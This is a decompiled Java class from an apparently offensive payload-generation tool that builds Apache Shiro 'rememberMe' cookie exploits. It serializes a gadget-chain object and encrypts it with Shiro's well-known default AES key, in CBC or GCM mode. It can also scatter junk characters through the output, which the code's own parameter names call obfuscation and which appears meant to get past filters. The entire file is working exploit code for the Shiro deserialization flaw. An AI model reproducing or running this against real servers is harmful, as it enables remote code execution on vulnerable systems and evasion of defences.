/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.AesUtil;
import com.ar3h.chains.core.payload.impl.JavaNativePayload;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.apache.commons.codec.binary.Base64;

@PayloadAnnotation(name="Shiro Payload", description="\u8fd4\u56de rememberMe= \u540e\u9762\u7684 Base64 Shiro Payload\n\u6ce8\u610f\u76ee\u6807\u73af\u5883\u53ef\u80fd\u4f1a\u6709header\u957f\u5ea6\u9650\u5236\uff0c\u4e00\u4e9b\u6bd4\u8f83\u957f\u7684Payload\u65e0\u6cd5\u4f7f\u7528\nShiro \u81ea\u5e26 CommonsBeanutils1 (CB\u94fe 1.9.4) \u94fe", gadgetTags={"JavaNativeDeserialize", "CustomJavaDeserialize"}, authors={"SummerSec", "Ar3h"}, priority=70)
public class ShiroPayload<T>
implements Payload<String, Object> {
    @Param(name="ShiroKey", description="Base64\u683c\u5f0fShiroKey")
    public String shiroKey = "kPH+bIxk5D2deZiIxcaaaA==";
    @Param(name="GCM\u6a21\u5f0f", description="\u9ad8\u7248\u672c Shiro 1.4.2 \u7248\u672c\u66f4\u6362\u4e3a\u4e86AES-GCM\u52a0\u5bc6\u65b9\u5f0f", type=ParamType.Boolean)
    public boolean gcmMode = false;
    @Param(name="\u6df7\u6dc6\u5b57\u7b26\u6570\u91cf", description="\u5747\u5300\u586b\u5145\u4ee5\u4e0b\u5783\u573e\u5b57\u7b26\u4e32\n`~!@#$^&*()_-{}[]:'<>?.", type=ParamType.Integer)
    @Min(value=0L)
    @Max(value=1000L)
    public @Min(value=0L) @Max(value=1000L) int dirtyLength = 0;
    public static String dirtyString = "`~!@#$^&*()_-{}[]:'<>?.";

    @Override
    public String marshal(Object object) throws Exception {
        byte[] serializedData = JavaNativePayload.serialize(object);
        String shiroPayload = ShiroPayload.buildPayload(Base64.decodeBase64(this.shiroKey), this.gcmMode, serializedData);
        return this.insertDirtyChar(shiroPayload, this.dirtyLength);
    }

    public static String buildPayload(byte[] key, boolean gcm, byte[] deserializedData) throws Exception {
        String shiroPayload = "";
        shiroPayload = gcm ? ShiroPayload.encryptWithGcm(deserializedData, key) : Base64.encodeBase64String(AesUtil.encrypt(deserializedData, key));
        return shiroPayload;
    }

    public static String encryptWithGcm(byte[] payload, byte[] key) {
        try {
            byte[] ivs = ShiroPayload.generateInitializationVector();
            SecretKeySpec skeySpec = new SecretKeySpec(key, "AES");
            Cipher cipher = Cipher.getInstance("AES/GCM/PKCS5Padding");
            GCMParameterSpec iv = new GCMParameterSpec(128, ivs);
            cipher.init(1, (Key)skeySpec, iv);
            byte[] encrypted = cipher.doFinal(payload);
            return new String(org.apache.shiro.codec.Base64.encode(ShiroPayload.byteMerger(ivs, encrypted)));
        }
        catch (Exception exception) {
            return "0";
        }
    }

    private static byte[] byteMerger(byte[] bt1, byte[] bt2) {
        byte[] bt3 = new byte[bt1.length + bt2.length];
        System.arraycopy(bt1, 0, bt3, 0, bt1.length);
        System.arraycopy(bt2, 0, bt3, bt1.length, bt2.length);
        return bt3;
    }

    private static byte[] generateInitializationVector() {
        int sizeInBytes = 16;
        byte[] ivBytes = new byte[sizeInBytes];
        SecureRandom random = ShiroPayload.getDefaultSecureRandom();
        random.nextBytes(ivBytes);
        return ivBytes;
    }

    private static SecureRandom getDefaultSecureRandom() {
        try {
            return SecureRandom.getInstance("SHA1PRNG");
        }
        catch (NoSuchAlgorithmException e) {
            return new SecureRandom();
        }
    }

    public String insertDirtyChar(String shiroPayload, int dirtyLength2) {
        if (dirtyLength2 == 0) {
            return shiroPayload;
        }
        StringBuilder result = new StringBuilder(shiroPayload);
        Random random = new Random();
        for (int i = 0; i < dirtyLength2; ++i) {
            int insertPosition = random.nextInt(result.length() + 1);
            char dirtyChar = dirtyString.charAt(random.nextInt(dirtyString.length()));
            result.insert(insertPosition, dirtyChar);
        }
        return result.toString();
    }
}

